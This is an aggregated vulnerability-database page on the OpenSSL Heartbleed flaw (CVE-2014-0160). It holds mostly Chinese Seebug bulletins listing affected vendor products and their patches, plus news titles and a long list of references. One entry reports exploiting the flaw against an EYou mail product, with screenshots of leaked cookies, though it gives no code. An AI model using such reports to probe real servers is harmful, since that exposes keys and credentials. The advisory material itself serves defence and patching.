src="https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg) [<img src="https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg) 内存里有cookies [<img src="https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg) id SSV:95013 last seen 2017-11-19 modified 2014-04-11 published 2014-04-11 reporter Root title 亿邮某版本OPENSSL heartbleed 通杀 bulletinFamily exploit description CVE ID:CVE-2014-0160 Kerio Control是一款防火墙系统。 Kerio Control所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Kerio Control 8.x Kerio Control 8.2.2 patch2已经修复该漏洞,建议用户下载使用: http://www.kerio.com id SSV:62189 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title Kerio Control OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 Barracuda多个产品存在安全漏洞。 Barracuda所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Barracuda CudaTel Communication Server 2.x Barracuda CudaTel Communication Server 3.x Barracuda Firewall 6.x Barracuda Link Balancer 2.x Barracuda Load Balancer Barracuda Load Balancer 4.x Barracuda Load Balancer ADC 5.x Barracuda Message Archiver Barracuda Message Archiver 3.x Barracuda Web Application Firewall 7.x Barracuda Web Filter Barracuda Web Filter 7.x 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: https://www.barracuda.com/blogs/pmblog?bid=2279 id SSV:62181 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title Barracuda多个产品OpenSSL TLS/DTLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 Oracle Session Monitor Suite是一款Oracle公司推出的会话监视套件。 Oracle Session Monitor Suite所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Oracle Session Monitor Suite 3.x Oracle Session Monitor Suite 3.3.40.2.1版本已修复该漏洞,建议用户下载使用: http://www.oracle.com id SSV:62240 last seen 2017-11-19 modified 2014-04-21 published 2014-04-21 reporter Root title Oracle Session Monitor Suite OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description OpenSSL is an open-source SSL implementation, used to implement the network communication of high-strength encryption, it is now widely used in various network applications. OpenSSL 0.9.8 za, 1.0.0 m, 1.0.1 h prior version, does not properly handle ChangeCipherSpec messages, which allows the middle attack in certain OpenSSL-to-OpenSSL communications within the use of a zero-length master key, and then use a specially crafted TLS handshake to hijack a session and gain sensitive information. OpenSSL TLS heartbeat read remote information disclosure Vulnerability (CVE-2014-0160) http://www.linuxidc.com/Linux/2014-04/99741.htm OpenSSL serious bug allows an attacker to read 64k of memory, and Debian half an hour to fix http://www.linuxidc.com/Linux/2014-04/99737.htm OpenSSL “heartbleed” security vulnerability http://www.linuxidc.com/Linux/2014-04/99706.htm By OpenSSL to provide FTP+SSL/TLS authentication functions, and to achieve secure data transmission http://www.linuxidc.com/Linux/2013-05/84986.htm * Source: KIKUCHI Masashi id SSV:92577 last seen 2017-11-19 modified 2016-12-20 published 2016-12-20 reporter Root title OpenSSL SSL/TLS MITM Vulnerability (CVE-2014-0224) bulletinFamily exploit description CVE ID:CVE-2014-0160 LibreOffice是一套可与其他主要办公室软体相容的套件,可在各种平台上执行。 LibreOffice所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 LibreOffice 4.x LibreOffice 4.2.3版本已修复该漏洞,建议用户下载使用: http://www.libreoffice.org/ id SSV:62190 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title LibreOffice OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 VMware多个产品存在安全漏洞。 VMware多个产品所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Nicira Network Virtualization Platform (NVP) 3.x VMware ESXi 5.x VMware NSX 4.x VMware NSX 6.x VMware Fusion 6.x Vmware Horizon Mirage 4.x VMware Horizon View 5.x VMware Horizon View Client 2.x VMware Horizon Workspace 1.x VMware OVF Tool 3.x VMware vCenter Server 5.x VMware vCloud Networking and Security (vCNS) 5.x 目前没有详细解决方案: http://www.vmware.com id SSV:62199 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title VMware多个产品OpenSSL TLS/DTLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 F-Secure E-mail/Server Security/F-Secure Server Security产品存在安全漏洞。 F-Secure E-mail/Server Security/F-Secure Server Security所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 F-Secure E-mail and Server Security 10.x F-Secure E-mail and Server Security 11.x F-Secure Server Security 10.x F-Secure Server Security 11.x 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: http://www.f-secure.com/en/web/labs_global/fsc-2014-1 id SSV:62185 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title F-Secure E-mail/Server Security OpenSSL TLS/DTLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 Attachmate Reflection是一款优秀的Unix终端仿真软件。 Attachmate Reflection所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Attachmate Reflection 14.x 目前没有详细解决方案: http://www.attachmate.com/ id SSV:62180 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title Attachmate Reflection OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 WatchGuard Fireware XTM是一款防火墙设备。 WatchGuard Fireware XTM所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 WatchGuard Fireware XTM 11.x WatchGuard Fireware XTM 11.8.3 Update 1版本已修复该漏洞,建议用户下载使用: http://watchguardsecuritycenter.com id SSV:62245 last seen 2018-07-03 modified 2014-04-21 published 2014-04-21 reporter Knownsec title Watchguard Fireware XTM OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 Sophos Antivirus是一款防病毒应用程序。 Sophos Antivirus for vShield所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Sophos Antivirus for vShield 1.0 Sophos Antivirus for vShield 1.1 目前没有详细解决方案: http://www.sophos.com id SSV:62197 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title Sophos Antivirus for vShield OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 HP多个产品存在安全漏洞。 HP多个产品所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 HP Onboard Administrator 4.x HP AssetManager 9.x HP Diagnostics 9.x HP IT Executive Scorecard 9.x HP LoadRunner 11.x HP LoadRunner 12.x HP OpenView Connect-It (CIT) 9.x HP Performance Center 11.x HP Performance Center 12.x HP Server Automation 10.x HP Service Manager 9.x HP Smart Update Manager (HP SUM) 6.x HP System Management Homepage 7.x HP UCMDB Browser 1.x HP UCMDB Browser 2.x HP UCMDB Browser 3.x HP Universal Discovery Universal CMDB Configuration Manager 10.x HP Universal Discovery Universal CMDB Configuration Manager 9.x 目前没有详细解决方案: http://www.hp.com id SSV:62186 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title HP多个产品OpenSSL TLS/DTLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 OpenVPN是一款开源VPN实现。 OpenVPN所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 OpenVPN 2.x OpenVPN 2.3.3-I002版本已修复该漏洞,建议用户下载使用: https://openvpn.net/ id SSV:62239 last seen 2017-11-19 modified 2014-04-21 published 2014-04-21 reporter Root title OpenVPN OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 BlackBerry Link是黑莓设备的同步软件。 BlackBerry Link所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 BlackBerry Link 1.x 目前没有详细解决方案: http://www.blackberry.com id SSV:62182 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title BlackBerry Link OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 PostgreSQL是一款对象关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 PostgreSQL 8.x PostgreSQL 9.x PostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3和8.4.21-3版本已经修复该漏洞,建议用户下载使用: http://www.enterprisedb.com id SSV:62241 last seen 2017-11-19 modified 2014-04-21 published 2014-04-21 reporter Root title PostgreSQL OpenSSL TLS心跳信息泄漏漏洞
The Hacker News
id THN:EBCB003D7DB7BD8BF73239F9718C6126 last seen 2018-01-27 modified 2014-04-12 published 2014-04-11 reporter Swati Khandelwal source https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html title NSA denies Report that Agency knew and exploited Heartbleed Vulnerability id THN:847F48AE6816E6BFF25355FC0EA7439A last seen 2018-01-27 modified 2017-01-23 published 2017-01-22 reporter Swati Khandelwal source https://thehackernews.com/2017/01/heartbleed-openssl-vulnerability.html title Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug id THN:3E9A13AAEA7FDC38D7BD8A148F19663D last seen 2018-01-27 modified 2014-04-12 published 2014-04-10 reporter Swati Khandelwal source https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html title How to Protect yourself from the 'Heartbleed' Bug id THN:244769C413FFA5BE647D8F6F93431B74 last seen 2018-01-27 modified 2014-04-17 published 2014-04-14 reporter Mohit Kumar source https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html title HeartBleed Bug Explained - 10 Most Frequently Asked Questions id THN:0F7112302CBABF46D19CACCCFA6103C5 last seen 2018-01-27 modified 2014-04-12 published 2014-04-08 reporter Wang Wei source https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html title Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable id THN:8D999AEE5218AD3BFA68E5ACE101F201 last seen 2018-01-27 modified 2014-04-12 published 2014-04-10 reporter Swati Khandelwal source https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html title How Heartbleed Bug Exposes Your Passwords to Hackers id THN:4868B616BCBA555DA2446F6F0EA837B0 last seen 2018-01-27 modified 2014-04-13 published 2014-04-13 reporter Swati Khandelwal source https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html title Billions of Smartphone Users affected by Heartbleed Vulnerability
Vulner Lab
| id | VULNERLAB:1254 |
| last seen | 2019-05-29 |
| modified | 2014-04-09 |
| published | 2014-04-09 |
| reporter | Vulnerability Laboratory [Research Team] |
| source | http://www.vulnerability-lab.com/get_content.php?id=1254 |
| title | HeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu |
Related news
References
- https://bugzilla.redhat.com/show_bug.cgi?id=1084875
- http://www.openssl.org/news/secadv_20140407.txt
- http://heartbleed.com/
- http://www.securitytracker.com/id/1030078
- http://seclists.org/fulldisclosure/2014/Apr/109
- http://seclists.org/fulldisclosure/2014/Apr/190
- https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html
- http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html
- http://rhn.redhat.com/errata/RHSA-2014-0376.html
- http://rhn.redhat.com/errata/RHSA-2014-0396.html
- http://www.securitytracker.com/id/1030082
- http://secunia.com/advisories/57347
- http://marc.info/?l=bugtraq&m=139722163017074&w=2
- http://www.securitytracker.com/id/1030077
- http://www-01.ibm.com/support/docview.wss?uid=swg21670161
- http://www.debian.org/security/2014/dsa-2896
- http://rhn.redhat.com/errata/RHSA-2014-0377.html
- http://www.securitytracker.com/id/1030080
- http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html
- http://www.securitytracker.com/id/1030074
- http://seclists.org/fulldisclosure/2014/Apr/90
- http://www.securitytracker.com/id/1030081
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed
- http://rhn.redhat.com/errata/RHSA-2014-0378.html
- http://seclists.org/fulldisclosure/2014/Apr/91
- http://secunia.com/advisories/57483
- http://www.splunk.com/view/SP-CAAAMB3
- http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html
- http://www.securitytracker.com/id/1030079
- http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html
- http://secunia.com/advisories/57721
- http://www.blackberry.com/btsc/KB35882
- http://www.securitytracker.com/id/1030026
- http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html
- http://www.securityfocus.com/bid/66690
- http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/
- http://www.us-cert.gov/ncas/alerts/TA14-098A
- http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/
- http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/
- https://blog.torproject.org/blog/openssl-bug-cve-2014-0160
- http://secunia.com/advisories/57966
- http://www.f-secure.com/en/web/labs_global/fsc-2014-1
- http://seclists.org/fulldisclosure/2014/Apr/173
- http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/
- http://secunia.com/advisories/57968
- https://code.google.com/p/mod-spdy/issues/detail?id=85
- http://www.exploit-db.com/exploits/32745
- http://www.kb.cert.org/vuls/id/720951
- https://www.cert.fi/en/reports/2014/vulnerability788210.html
- http://www.exploit-db.com/exploits/32764
- http://secunia.com/advisories/57836
- https://gist.github.com/chapmajs/10473815
- http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/
- http://cogentdatahub.com/ReleaseNotes.html
- http://marc.info/?l=bugtraq&m=139905458328378&w=2
- http://marc.info/?l=bugtraq&m=139869891830365&w=2
- http://marc.info/?l=bugtraq&m=139889113431619&w=2
- http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1
- http://www.kerio.com/support/kerio-control/release-history
- http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3
- http://advisories.mageia.org/MGASA-2014-0165.html
- https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken
- http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
- http://www-01.ibm.com/support/docview.wss?uid=isg400001843
- https://filezilla-project.org/versions.php?type=server
- http://www-01.ibm.com/support/docview.wss?uid=isg400001841
- https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217
- http://marc.info/?l=bugtraq&m=141287864628122&w=2
- http://seclists.org/fulldisclosure/2014/Dec/23
- http://www.vmware.com/security/advisories/VMSA-2014-0012.html
- http://marc.info/?l=bugtraq&m=142660345230545&w=2
- http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
- http://www.mandriva.com/security/advisories?name=MDVSA-2015:062
- http://marc.info/?l=bugtraq&m=139817727317190&w=2
- http://marc.info/?l=bugtraq&m=139757726426985&w=2
- http://marc.info/?l=bugtraq&m=139758572430452&w=2
- http://marc.info/?l=bugtraq&m=139905653828999&w=2
- http://marc.info/?l=bugtraq&m=139842151128341&w=2
- http://marc.info/?l=bugtraq&m=139905405728262&w=2
- http://marc.info/?l=bugtraq&m=139833395230364&w=2
- http://marc.info/?l=bugtraq&m=139824993005633&w=2
- http://marc.info/?l=bugtraq&m=139843768401936&w=2
- http://marc.info/?l=bugtraq&m=139905202427693&w=2
- http://marc.info/?l=bugtraq&m=139774054614965&w=2
- http://marc.info/?l=bugtraq&m=139889295732144&w=2
- http://marc.info/?l=bugtraq&m=139835815211508&w=2
- http://marc.info/?l=bugtraq&m=140724451518351&w=2
- http://marc.info/?l=bugtraq&m=139808058921905&w=2
- http://marc.info/?l=bugtraq&m=139836085512508&w=2
- http://marc.info/?l=bugtraq&m=139869720529462&w=2
- http://marc.info/?l=bugtraq&m=139905868529690&w=2
- http://marc.info/?l=bugtraq&m=139765756720506&w=2
- http://marc.info/?l=bugtraq&m=140015787404650&w=2
- http://marc.info/?l=bugtraq&m=139824923705461&w=2
- http://marc.info/?l=bugtraq&m=139757919027752&w=2
- http://marc.info/?l=bugtraq&m=139774703817488&w=2
- http://marc.info/?l=bugtraq&m=139905243827825&w=2
- http://marc.info/?l=bugtraq&m=140075368411126&w=2
- http://marc.info/?l=bugtraq&m=139905295427946&w=2
- http://marc.info/?l=bugtraq&m=139835844111589&w=2
- http://marc.info/?l=bugtraq&m=139757819327350&w=2
- http://marc.info/?l=bugtraq&m=139817685517037&w=2
- http://marc.info/?l=bugtraq&m=139905351928096&w=2
- http://marc.info/?l=bugtraq&m=139817782017443&w=2
- http://marc.info/?l=bugtraq&m=140752315422991&w=2
- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00
- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661
- http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf
- http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf
- http://secunia.com/advisories/59347
- http://secunia.com/advisories/59243
- http://secunia.com/advisories/59139
- http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html
- http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01
- https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html
- http://support.citrix.com/article/CTX140605
- http://www.ubuntu.com/usn/USN-2165-1
- http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html
- http://www.securityfocus.com/archive/1/534161/100/0/threaded
- https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008
- https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-635659.pdf
- https://yunus-shn.medium.com/ricon-industrial-cellular-router-heartbleed-attack-2634221c02bd
- http://git.openssl.org/gitweb/?p=openssl.git%3Ba=commit%3Bh=96db9023b881d7cd9f379b0c154650d6c108e9a3
- https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d%40%3Cdev.tomcat.apache.org%3E
- https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3Cdev.tomcat.apache.org%3E
- https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3Cdev.tomcat.apache.org%3E
- https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3Cdev.tomcat.apache.org%3E